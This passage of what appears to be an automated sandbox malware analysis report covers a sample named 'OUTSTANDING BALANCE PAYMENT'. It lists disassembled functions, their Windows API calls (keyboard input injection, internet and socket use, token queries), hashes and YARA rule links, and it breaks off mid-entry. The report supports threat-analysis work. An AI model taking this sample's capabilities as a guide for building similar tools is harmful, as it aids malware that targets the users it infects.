                                                                  • Instruction Fuzzy Hash: AB31F4746A1185ABEF239F5ACC89FAA7768EB06310FD04502FA51D61E1C770E9608B51
                                                                  Function 002ED7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 002ED807
                                                                  • GetWindowRect.USER32(?,?), ref: 002ED87D
                                                                  • PtInRect.USER32(?,?,002EED5A), ref: 002ED88D
                                                                  • MessageBeep.USER32(00000000), ref: 002ED8FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1352109105-0
                                                                  • Opcode ID: de1a546213f98f7e88d0be4ec94d9212369775513f5bb6c553449c8927e96868
                                                                  • Instruction ID: 0022be2016e0c6a31a81f462e8af748f7941536a524d0676e6e10ce61e2457db
                                                                  • Opcode Fuzzy Hash: de1a546213f98f7e88d0be4ec94d9212369775513f5bb6c553449c8927e96868
                                                                  • Instruction Fuzzy Hash: 3541CF74A50289DFCB12CF5AC880BA97BF9FF46310F5981A9E8148F250C730E852CF40
                                                                  Function 002C3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 002C3AB8
                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 002C3AD4
                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 002C3B34
                                                                  • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 002C3B92
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 2b74ea3488c69f8c285f9e653b5c64f621098b039466d8e4e7916b2fc010953c
                                                                  • Instruction ID: b2312052cc33a2aca2db42779eeccb54239bb9d64e08b70006c3ad8db14b9879
                                                                  • Opcode Fuzzy Hash: 2b74ea3488c69f8c285f9e653b5c64f621098b039466d8e4e7916b2fc010953c
                                                                  • Instruction Fuzzy Hash: 90316830920258AEEF21DB648819FFE7BB9AB45318F044B1EE485931C1CB759F65CB61
                                                                  Function 002B4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002B4038
                                                                  • __isleadbyte_l.LIBCMT ref: 002B4066
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002B4094
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 002B40CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: 2561736f6c7e0a614b69d48f3f119eda5d5ad0d42220d32a5a2bf69ac56abf15
                                                                  • Instruction ID: 68a7074c6994db627ea26361c99c0c82d094a4f19c2c501a6b01aa2d78276612
                                                                  • Opcode Fuzzy Hash: 2561736f6c7e0a614b69d48f3f119eda5d5ad0d42220d32a5a2bf69ac56abf15
                                                                  • Instruction Fuzzy Hash: 0731D430520216AFDB29BF74C884BFA7BB5FF41390F154819EA6187092E731D8B0DB90
                                                                  Function 002E7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 002E7CB9
                                                                    • Part of subcall function 002C5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 002C5F6F
                                                                    • Part of subcall function 002C5F55: GetCurrentThreadId.KERNEL32 ref: 002C5F76
                                                                    • Part of subcall function 002C5F55: AttachThreadInput.USER32(00000000,?,002C781F), ref: 002C5F7D
                                                                  • GetCaretPos.USER32(?), ref: 002E7CCA
                                                                  • ClientToScreen.USER32(00000000,?), ref: 002E7D03
                                                                  • GetForegroundWindow.USER32 ref: 002E7D09
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                  • String ID:
                                                                  • API String ID: 2759813231-0
                                                                  • Opcode ID: 25fc7d69c3b60b254489d97d584a58e54706146abda1dc1265636461b33c9f4c
                                                                  • Instruction ID: ae21da8e63f37f549e43ec43fc001f8091de905e4eced365f1a936bb9e49daa4
                                                                  • Opcode Fuzzy Hash: 25fc7d69c3b60b254489d97d584a58e54706146abda1dc1265636461b33c9f4c
                                                                  • Instruction Fuzzy Hash: 9B311E72910108AFDB11EFA9D8459EFBBFDEF54310B11846AE815E3211DA31AE55CFA0
                                                                  Function 002EF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • GetCursorPos.USER32(?), ref: 002EF211
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,002FE4C0,?,?,?,?,?), ref: 002EF226
                                                                  • GetCursorPos.USER32(?), ref: 002EF270
                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,002FE4C0,?,?,?), ref: 002EF2A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                  • String ID:
                                                                  • API String ID: 2864067406-0
                                                                  • Opcode ID: 9e2d2e0dae15df3a319c24c780469df7254cdc3224962522542f53c097e5b779
                                                                  • Instruction ID: e5c3c80698f4b40c26d5f6d5c6fd13a64a154af79f7847d29a7e72fa136585c4
                                                                  • Opcode Fuzzy Hash: 9e2d2e0dae15df3a319c24c780469df7254cdc3224962522542f53c097e5b779
                                                                  • Instruction Fuzzy Hash: 0621B139611418AFDB168F95DD58EEE7BB9EF0A310F444069FE094B2A1D3349D60DB50
                                                                  Function 002D431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002D4358
                                                                    • Part of subcall function 002D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002D4401
                                                                    • Part of subcall function 002D43E2: InternetCloseHandle.WININET(00000000), ref: 002D449E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 1463438336-0
                                                                  • Opcode ID: ab73a464a2651d7703f3b4d1fbe89636cda5525fcf3e454f9619e77d8dd3c8b8
                                                                  • Instruction ID: 58bce58bf6206e4702bb15bc321fff8d2d5dd8bf9ad88e88fe48d91eef4d96dd
                                                                  • Opcode Fuzzy Hash: ab73a464a2651d7703f3b4d1fbe89636cda5525fcf3e454f9619e77d8dd3c8b8
                                                                  • Instruction Fuzzy Hash: EF219231211605BBDB12AF649C00F7BB7E9FF48710F24401BBA5596750D7B19C319B90
                                                                  Function 002E8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 002E8AA6
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002E8AC0
                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002E8ACE
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002E8ADC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long$AttributesLayered
                                                                  • String ID:
                                                                  • API String ID: 2169480361-0
                                                                  • Opcode ID: 95e93b515142c917e654c1a0f14fe0bff2ea780820059299e3ddaf5e07d2e22d
                                                                  • Instruction ID: ed138a44fd230eb03b49c338e6f96da69866a37182b24ee91d70a0d5f3d053d3
                                                                  • Opcode Fuzzy Hash: 95e93b515142c917e654c1a0f14fe0bff2ea780820059299e3ddaf5e07d2e22d
                                                                  • Instruction Fuzzy Hash: 6411B131266111AFD705AB59CC15FBA779DBF85320F14411AF95ACB2E2CF70AC208B90
                                                                  Function 002D8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 002D8AE0
                                                                  • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 002D8AF2
                                                                  • accept.WSOCK32(00000000,00000000,00000000), ref: 002D8AFF
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8B16
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastacceptselect
                                                                  • String ID:
                                                                  • API String ID: 385091864-0
                                                                  • Opcode ID: 7390e0deec01423fb155dea6ee04f46ca0ed88b08f893ac3873bf68c78d91d9d
                                                                  • Instruction ID: a12bbc77e3deca0f1eff298c71ed3ee41002f49ec476c8674f79a44d316fe4f6
                                                                  • Opcode Fuzzy Hash: 7390e0deec01423fb155dea6ee04f46ca0ed88b08f893ac3873bf68c78d91d9d
                                                                  • Instruction Fuzzy Hash: 9A219372A01124AFC7119F68C895A9EBBFCEF49710F00416BF849D7291DB74DE458F90
                                                                  Function 002C0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002C0ABB,?,?,?,002C187A,00000000,000000EF,00000119,?,?), ref: 002C1E77
                                                                    • Part of subcall function 002C1E68: lstrcpyW.KERNEL32(00000000,?,?,002C0ABB,?,?,?,002C187A,00000000,000000EF,00000119,?,?,00000000), ref: 002C1E9D
                                                                    • Part of subcall function 002C1E68: lstrcmpiW.KERNEL32(00000000,?,002C0ABB,?,?,?,002C187A,00000000,000000EF,00000119,?,?), ref: 002C1ECE
                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002C187A,00000000,000000EF,00000119,?,?,00000000), ref: 002C0AD4
                                                                  • lstrcpyW.KERNEL32(00000000,?,?,002C187A,00000000,000000EF,00000119,?,?,00000000), ref: 002C0AFA
                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,002C187A,00000000,000000EF,00000119,?,?,00000000), ref: 002C0B2E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                  • String ID: cdecl
                                                                  • API String ID: 4031866154-3896280584
                                                                  • Opcode ID: 671f196e7ed0de53040b36229043ce12e358e6feccc331775008ae90508e1e55
                                                                  • Instruction ID: b8ea71c8acc20357cdf9e0dbd87cc7e1f2c1fb579ce7a4572752d4d518965f0f
                                                                  • Opcode Fuzzy Hash: 671f196e7ed0de53040b36229043ce12e358e6feccc331775008ae90508e1e55
                                                                  • Instruction Fuzzy Hash: FB118136220305EFDB25AF64DC45E7A77A8FF49354F80416AE906CB251EB719C60C7A0
                                                                  Function 002B2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _free.LIBCMT ref: 002B2FB5
                                                                    • Part of subcall function 002A395C: __FF_MSGBANNER.LIBCMT ref: 002A3973
                                                                    • Part of subcall function 002A395C: __NMSG_WRITE.LIBCMT ref: 002A397A
                                                                    • Part of subcall function 002A395C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000001,00000000,?,?,0029F507,?,0000000E), ref: 002A399F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free
                                                                  • String ID:
                                                                  • API String ID: 614378929-0
                                                                  • Opcode ID: ece941010a6ac783a253ce4cd74608dda2448555bd5b58d7e0c3233d6f01a0f2
                                                                  • Instruction ID: 3613a009fbc5f685692b58f2416f7cc9d3887ab653164769911aa342a0d494b5
                                                                  • Opcode Fuzzy Hash: ece941010a6ac783a253ce4cd74608dda2448555bd5b58d7e0c3233d6f01a0f2
                                                                  • Instruction Fuzzy Hash: 0511E732529316ABCB227FB4AC046AA3B98AF153B0F204826F8499A151DF70C9708E90
                                                                  Function 002C058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002C05AC
                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002C05C7
                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002C05DD
                                                                  • FreeLibrary.KERNEL32(?), ref: 002C0632
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                  • String ID:
                                                                  • API String ID: 3137044355-0
                                                                  • Opcode ID: 269c8328e5496eaaa5cef8f820664ca6ecdd29906614e773419013641e126482
                                                                  • Instruction ID: 11d5882dea788441278c4e5c516b572c8595719e8cffbcbbc0860c3a7f2ed52a
                                                                  • Opcode Fuzzy Hash: 269c8328e5496eaaa5cef8f820664ca6ecdd29906614e773419013641e126482
                                                                  • Instruction Fuzzy Hash: 45215971911209EBEB21CF91DCD8FDABBBCEF40700F10866EA516A6050DBB0EA659F50
                                                                  Function 002C6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002C6733
                                                                  • _memset.LIBCMT ref: 002C6754
                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002C67A6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002C67AF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                  • String ID:
                                                                  • API String ID: 1157408455-0
                                                                  • Opcode ID: 12f5cb024f5756003f84c6e3c5684440758a19b0cbf80cac810b424916c02ea2
                                                                  • Instruction ID: d1a560fc21f97f139c082c7f9ab6a61e6f31aab78711f643e5158c76cfeaa941
                                                                  • Opcode Fuzzy Hash: 12f5cb024f5756003f84c6e3c5684440758a19b0cbf80cac810b424916c02ea2
                                                                  • Instruction Fuzzy Hash: 85110A76D012287AE7205BA5AC4DFABBABCEF44724F10469AF504E71C0D6744E848B64
                                                                  Function 002BB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 002BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002BAA79
                                                                    • Part of subcall function 002BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002BAA83
                                                                    • Part of subcall function 002BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002BAA92
                                                                    • Part of subcall function 002BAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002BAA99
                                                                    • Part of subcall function 002BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002BAAAF
                                                                  • GetLengthSid.ADVAPI32(?,00000000,002BADE4,?,?), ref: 002BB21B
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002BB227
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 002BB22E
                                                                  • CopySid.ADVAPI32(?,00000000,?), ref: 002BB247
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                  • String ID:
                                                                  • API String ID: 4217664535-0
                                                                  • Opcode ID: 412dd5d966c44897d4d88930bcbffbe670c839f21a13d6842099b5ce471544eb
                                                                  • Instruction ID: 827e9568dd6066b4404bfb28b7ca6b0564e0efbd2ce3ad378ebb8de77c0d6caf
                                                                  • Opcode Fuzzy Hash: 412dd5d966c44897d4d88930bcbffbe670c839f21a13d6842099b5ce471544eb
                                                                  • Instruction Fuzzy Hash: C011C171A10205EFCB059F98CCA5AEEB7BDEF84344F14802EE94297211D771AE54CB10
                                                                  Function 002BB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 002BB498
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002BB4AA
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002BB4C0
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002BB4DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 48ea6a323fde4e6303b7667030a7ac1e3596fea41c4e0b262bc6d7919b5cc04c
                                                                  • Instruction ID: bc670ab65219cc78df0a5c0a99555ced8ec8bc22b2e0132c8e5a596b40db2984
                                                                  • Opcode Fuzzy Hash: 48ea6a323fde4e6303b7667030a7ac1e3596fea41c4e0b262bc6d7919b5cc04c
                                                                  • Instruction Fuzzy Hash: 05112A7A900218FFDB11DFA9C985EDEBBB8FB08750F204091E604B7295D7B1AE11DB94
                                                                  Function 0029B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0029B5A5
                                                                  • GetClientRect.USER32(?,?), ref: 002FE69A
                                                                  • GetCursorPos.USER32(?), ref: 002FE6A4
                                                                  • ScreenToClient.USER32(?,?), ref: 002FE6AF
                                                                  Memory Dump Source
